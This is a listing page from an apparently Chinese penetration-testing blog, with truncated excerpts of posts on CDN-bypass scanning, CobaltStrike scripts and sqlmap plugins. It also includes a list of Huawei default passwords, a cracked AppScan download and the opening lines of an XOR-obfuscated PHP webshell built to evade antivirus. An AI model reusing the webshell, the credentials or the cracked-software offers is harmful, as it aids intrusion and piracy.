会飞的鱼

渗透工具

扫描全网绕过CDN获取网站真实IP地址:w8Fuckcdn

admins 阅读(191)评论(0)

w8Fuckcdn 绕过CDN获取真实IP现在站点使用CDN来提速是很常见的,w8Fuckcdn通过扫描全网绕过CDN获取网站真实IP地址。CDN , IP , masscanCDN特性支持winodws/linuxgevent 协程IO 最大化利用资源masscan扫描,最快能6分钟扫完全网支持HTTPS支持调节masscan的rate(速率)程序流程基于...

热门
web安全

苹果CMS/MacCMS V10后门WebShell,第三方下载注意

admins 阅读(110)评论(0)

苹果CMS/MacCMS苹果CMS是国内优秀的开源PHP建站系统,擅长电影程序影视系统这一块,在主流建站系统中特色鲜明,以灵活、小巧、兼容性好、负载强等优点而深受许多站长的喜爱。MacCMS后门Webshell某天始,MacCMS官网因为某些原因停摆。同时在百度搜索苹果CMS或MacCMS出现的排名第一均为一个:www.maccmsv10.com的网址,而真...

热门
渗透工具

值得收藏!史上最全Windows安全工具锦集

admins 阅读(290)评论(0)

“工欲善其事,必先利其器。”近日,深信服安全团队整理了一些常见的PE工具、调试反汇编工具、应急工具、流量分析工具和WebShell查杀工具,希望可以帮助到一些安全行业的初学者。PE工具篇PEiD一款著名的PE侦壳工具,可以检测PE常见的一些壳,但是目前已经无法从官网获得:EXEInfo PEPE侦壳工具,PEiD的加强版,可...

热门
渗透工具

Burpsuite联动sqlmap插件:sqlmap4burp++

admins 阅读(236)评论(0)

sqlmap4burp++介绍sqlmap4burp++是一款兼容Windows,mac,linux多个系统平台的Burpsuite与sqlmap联动插件。在sqlmap4burp基础上进行了如下改动:在支持Windows基础上,拓展对Linux,macOS的支持移除对commons-io-.jar,commons-langs-.jar的依赖移除Burpsu...

热门
渗透工具

CobaltStrike渗透神器AggressorScripts脚本收集项目

admins 阅读(350)评论(0)

Cobalt Strike 渗透神器CobatStrike是一款基于java编写的全平台多方协同后渗透测试攻击框架。CobaltStrike集成了端口转发、端口扫描、socket代理、提权、钓鱼、木马、远程控制等功能。该工具几乎覆盖了APT攻击链中所需要用到的各个技术环节。它是收费软件,特殊版本请在本站搜索CobaltStrike。AggressorScri...

热门
渗透工具

白鹿社工字典生成器

admins 阅读(293)评论(0)

白鹿社工字典生成器白鹿社工字典生成器,灵活与易用兼顾。本工具及思路旨在对网络安全从业人员和白帽子进行合法渗透测试时提供帮助,使用前请遵循相关法律法规,禁止用于任何非法用途。社工弱口令的构成以部分华为常用登录帐户默认密码为例:(附:华为帐户信息一览表)1234567Admin@123Huawei@001GalaxManager_2012Huawei_123Uh...

热门
免杀木马

免杀PHP一句话一枚

admins 阅读(412)评论(0)

免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; $gba = 'H...

热门
渗透工具

Web漏扫软件 AppScan 9.0.3.13 破解版本下载

admins 阅读(850)评论(2)

0x01 介绍IBM AppScan是一款非常好用且功能强大的Web 应用安全测试工具,曾以 Watchfire AppScan 的名称享誉业界,Rational AppScan 可自动化 Web 应用的安全漏洞评估工作,能扫描和检测所有常见的 Web 应用安全漏洞,例如 SQL 注入(SQL-injection)、跨站点脚本攻击(cross-site sc...

热门
切换注册

登录

您也可以使用第三方帐号快捷登录

Q Q 登 录
微 博 登 录
切换登录

注册